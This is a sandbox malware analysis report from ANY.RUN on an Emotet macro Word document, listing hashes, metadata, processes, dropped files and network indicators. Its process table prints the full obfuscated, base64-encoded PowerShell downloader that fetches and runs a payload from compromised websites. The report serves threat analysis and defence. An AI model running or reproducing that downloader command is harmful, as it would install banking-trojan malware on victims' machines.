analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

007568477323797029.doc

Full analysis: https://app.any.run/tasks/ca5c9db7-6976-47fb-9904-47c235ce0a28
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 08:59:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: sky blue, Subject: Checking Account, Author: Mollie Metz, Keywords: Analyst, Comments: Down-sized, Template: Normal.dotm, Last Saved By: Haley Boyle, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 07:26:00 2019, Last Saved Time/Date: Mon Oct 14 07:26:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 176, Security: 0
MD5:

2D2AA9F878E52C02D6A1B53E56FF35DD

SHA1:

CB577713F8CA874AEE47BC0D3A2D4CD96E43E7A5

SHA256:

033D959D2B20CA148C5C2D492783092EE6CE9BA886A996B4CCFE7C8FB1E9C5C4

SSDEEP:

6144:CaxMIdtPWuMrbfFtr6/DVokOe89/uvbuoh:Ca7dtPWuM76/KeyM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 3696)
    • Creates files in the user directory

      • powershell.exe (PID: 3696)
    • PowerShell script executed

      • powershell.exe (PID: 3696)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1956)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1956)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: sky blue
Subject: Checking Account
Author: Mollie Metz
Keywords: Analyst
Comments: Down-sized
Template: Normal.dotm
LastModifiedBy: Haley Boyle
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:10:14 06:26:00
ModifyDate: 2019:10:14 06:26:00
Pages: 1
Words: 30
Characters: 176
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Gibson - Satterfield
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 205
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Kessler
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1956"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\007568477323797029.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3696powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABhADIAZQBkADIAOQA1ADEANgA4ADIAMgBiAD0AJwBhADAAeAAzADYANwA2ADUAZQBjAGMAMgA4ACcAOwAkAGEAMAB4AGMAZABjADQAZgA0ADAAYQBhAGUAZQAxACAAPQAgACcANwA5ADgAJwA7ACQAYQAwAHgAYQBkADEANQA0ADkANwAyADMANwAwADAAYQA9ACcAYQAwAHgAMgBjADgAOQBmADYANwA2AGIAYQAzAGUANgBjACcAOwAkAGEAMAB4ADgANABhADMAMAA5AGIAMgA0ADYANABhADEAMQBhAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABhADAAeABjAGQAYwA0AGYANAAwAGEAYQBlAGUAMQArACcALgBlAHgAZQAnADsAJABhADAAeABmAGMAYgBjAGIAMQBkADcAZAAzADAAMwA9ACcAYQAwAHgANAA0ADYANwBmAGIANwAwADkAZgAyADYAJwA7ACQAYQAwAHgANgA3ADIAZABlAGUAZAAxAGEANwA3AGIAZgBmAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBCAGMAbABpAEUAbgB0ADsAJABhADAAeAAxAGEAZAA0AGIANQA2ADcAMwA4ADIAMAA0AD0AJwBoAHQAdABwADoALwAvAGMAbwBhAHMAdABhAGwAdABoAGUAcgBhAHAAeQAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AYwBoAHoAMAB1ADkAMwA0ADcALwAqAGgAdAB0AHAAOgAvAC8AYgByAGEAbgBkAHMAbwBmAHoAYQBtAGIAaQBhAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwAwAHEAcwBzAGcAMwA4ADQAMQAvACoAaAB0AHQAcABzADoALwAvAGIAdQBzAGUAYQBjAHkAYwBsAGUALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBnAGsAMAA1ADYALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBiAG8AawBzAGwAaQBuAGsALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHAAawA5ADcAMAA5ADYALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGgAbwBsAGwAeQB3AG8AbwBkAGMAbAB1AGIALgB4AHkAegAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHUAYQA2ADcAdgAzADIAOAA4AC8AJwAuACIAUwBwAEwAYABJAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADAAYgAwADYAZQA1ADEANABlAGEAOQAxAGYAMAA9ACcAYQAwAHgANgA0ADYANQA1AGYANwBlAGMAOQBhAGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAGEAMAB4ADIAYgA1ADQAOAAyAGYAYgBiAGEAIABpAG4AIAAkAGEAMAB4ADEAYQBkADQAYgA1ADYANwAzADgAMgAwADQAKQB7AHQAcgB5AHsAJABhADAAeAA2ADcAMgBkAGUAZQBkADEAYQA3ADcAYgBmAGYALgAiAEQAbwBgAHcAbgBgAEwAbwBgAEEAZABmAEkATABlACIAKAAkAGEAMAB4ADIAYgA1ADQAOAAyAGYAYgBiAGEALAAgACQAYQAwAHgAOAA0AGEAMwAwADkAYgAyADQANgA0AGEAMQAxAGEAKQA7ACQAYQAwAHgAOQA0AGIAMgA2ADIAMwBhADUAYQA0AD0AJwBhADAAeABlAGMANwA0AGQAOABlAGYAMAA0ADEAMwAxAGEANAAnADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQB0AGUAbQAnACkAIAAkAGEAMAB4ADgANABhADMAMAA5AGIAMgA0ADYANABhADEAMQBhACkALgAiAEwAYABlAG4ARwBgAFQASAAiACAALQBnAGUAIAAzADMANwA5ADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBgAFQAYQBSAHQAIgAoACQAYQAwAHgAOAA0AGEAMwAwADkAYgAyADQANgA0AGEAMQAxAGEAKQA7ACQAYQAwAHgAMQAxADEANAA2AGMAOQA5ADgAYgBlAGMAMQA9ACcAYQAwAHgAYgBmAGQAYwAzADkANQAzAGEANABhAGQANQBlADEAJwA7AGIAcgBlAGEAawA7ACQAYQAwAHgAZgAxAGYAMwBhADkAOABmAGQAYgA1AGQAPQAnAGEAMAB4AGYANwA3ADEAYwA3ADcAOABiAGQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgAYgBlADQAYQA2AGMAZQBkADAANgA2ADEANgA9ACcAYQAwAHgANgBlAGYANgBhADAAYgBlAGUANwBmACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 883
Read events
1 080
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
15

Dropped files

PID
Process
Filename
Type
1956WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7E3.tmp.cvr
MD5:
SHA256:
3696powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MZ5AEVNMI9WERK9M09I9.temp
MD5:
SHA256:
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ECDE2A7D.wmfwmf
MD5:05595FC21ACBBA239042DE4DAA3D34B0
SHA256:711ED442DCD87E52DD09AC36028BC9097185A6B2B0806BF6F1C8F6A23E948E10
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A58D8BA1.wmfwmf
MD5:9A1EAB39FBCA8211CE08A168FB9D0A30
SHA256:76DE905699B29B2BFF5F67976568E891F9AA1871B4FF3C4D4BBF5D812324B802
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2AF06F57.wmfwmf
MD5:A33E1EC7A3A7DD344801F7A7B24A9001
SHA256:93FC29FF69FB0A1FC38DAFA3E62C9C513E608A88B9DA9E5AAABA2D28471A33A1
1956WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:57C065C449D8BDBE8737E8BAAC4E9580
SHA256:338318F0365ED3E71A63797DE1E923710D5CA3EA4623141F225DEB0646C962DC
1956WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:8F075BB0AE023181809453A80F74AC1A
SHA256:18CB1862DFBEE26D8B966484BC3451380FCC13F719C272208B38839A41222D6F
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4058C46.wmfwmf
MD5:BC418E525E43757B8BF915AE5762E191
SHA256:BD6E0F9412E116AC9997596F2E8741BE94D8F5011D8FB65190BC73CEA2F4DE03
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9EB7220.wmfwmf
MD5:3AC2A149E1FA4F0B4901E12E2D0C3DB1
SHA256:3FFC095226E35F63B96D16E1C3CCA89CA3AE8961DAE91C5C01EBC214FE565C5B
1956WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\708B3D2E.wmfwmf
MD5:F5EC9F30617A6F4BE91718F3DEAF8F3F
SHA256:CD62F1FBFAB890C51562A74453DB5D5C0E3AD4DCC8DD0D19A788CBF16D83113E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3696
powershell.exe
GET
50.28.1.57:80
http://coastaltherapy.com/wp-includes/chz0u9347/
US
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3696
powershell.exe
50.28.1.57:80
coastaltherapy.com
Liquid Web, L.L.C
US
suspicious

DNS requests

Domain
IP
Reputation
coastaltherapy.com
  • 50.28.1.57
suspicious

Threats

No threats detected
No debug info